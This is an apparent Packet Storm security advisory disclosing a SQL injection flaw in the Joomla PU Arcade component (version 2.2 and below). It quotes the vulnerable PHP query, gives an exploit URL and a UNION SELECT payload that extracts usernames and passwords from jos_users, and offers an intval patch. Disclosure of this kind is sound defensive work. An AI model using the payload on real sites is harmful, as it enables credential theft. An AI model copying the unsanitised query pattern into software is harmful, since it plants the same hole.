The Joomla component PU Arcade versions 2.2 and below suffer from a SQL injection vulnerability.
58867d325dee02be37877858b3c185ff14f3d5af48eff4fae6e098f0e848b169I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .
SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .
--------------------------------------------------------------------------------------------------------------------------
Author : MantiS
---------
Vulnerable code :
------------------------
function warningByGame($gid) {
global $database;
$query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"
. " WHERE g.contentratingid = c.id"
. " AND g.id = $gid";
$database->setQuery($query);
$cont = $database->loadObjectList();
--------------------------
Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]
---------
Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .
Patch :
--------
Place before "$query = "SELECT c.id......... " :
$gid = intval($_GET['gid']);
To force $gid variable conversion at an integer .
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed